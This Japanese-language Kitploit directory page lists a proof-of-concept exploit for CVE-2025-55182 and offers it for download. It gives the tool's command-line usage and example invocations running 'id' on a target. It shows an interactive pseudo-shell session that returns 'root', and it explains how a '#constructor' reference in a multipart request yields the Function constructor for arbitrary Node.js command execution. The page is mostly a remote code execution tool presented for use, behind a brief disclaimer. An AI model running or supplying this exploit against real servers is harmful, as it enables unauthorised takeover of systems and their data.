Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-PoC — CVE-2025-55182 の Poc | Kitploit
ツール/GitHubGitHub/emiyelbarto/cve-2025-55182-poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubemiyelbarto/cve-2025-55182-poc

CVE-2025-55182-PoC

CVE-2025-55182 の Poc

リポジトリを見る
19ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182-PoC

CVE-2025-55182 の PoC

root@kitploit:~
Usage: python3 poc.py -u http://target.com --cmd "<cmd_here>"

法的免責事項

このツールは、教育目的および許可されたセキュリティテスト専用に提供されています。事前に相互の同意なしにターゲットへの攻撃にこのツールを使用することは違法です。開発者は一切の責任を負わず、本プログラムによって引き起こされた誤用や損害についても責任を負いません。

要件

pip install requests

使用方法

このツールは、Check(チェック)、Exploit(エクスプロイト)、Interactive Shell(対話型シェル)の3つのモードで実行できます。

root@kitploit:~
usage: poc.py [-h] [-u URL] [--id ID] [-c CMD] [--check]

options:
  -h, --help         show this help message and exit
  -u URL             Target URL (e.g., http://localhost:3000)
  --id ID            Target Server Action ID (default: user-profile-action)
  -c CMD, --cmd CMD  Command to execute directly (non-interactive mode)
  --check            Only check for vulnerability (Crash Method), do not exploit

例

root@kitploit:~
python3 poc.py -u http://target-site.com --check

単一コマンドの実行

root@kitploit:~
python3 poc.py -u http://target-site.com --cmd "id"

対話型シェルモード

root@kitploit:~
python3 poc.py

# Inside the shell
RSC-Shell> set url http://localhost:3000
[+] URL set to: http://localhost:3000
RSC-Shell> check
[+] TARGET IS VULNERABLE!
RSC-Shell> shell
[*] Starting pseudo-interactive shell. Use 'exit' to return.
cmd> whoami
root

仕組み

Check(チェック): インデックス1で {} を定義するマルチパートリクエストを送信し、["$1🅰️a"] へのアクセスを試みます。パッチ適用前のサーバーは、undefined のプロパティ a にアクセスしようとしてクラッシュします(HTTP 500)。パッチ適用済みのサーバーは HTTP 200 を返します。

Exploit(エクスプロイト): 有効なAction IDを参照するマルチパートリクエストを送信しますが、#constructor を追加します。これにより、シリアライザーが Function コンストラクタを返すように仕向け、サーバー上で実行される任意のJavaScript(Node.js child_process)を渡すことができます。

ツールをダウンロード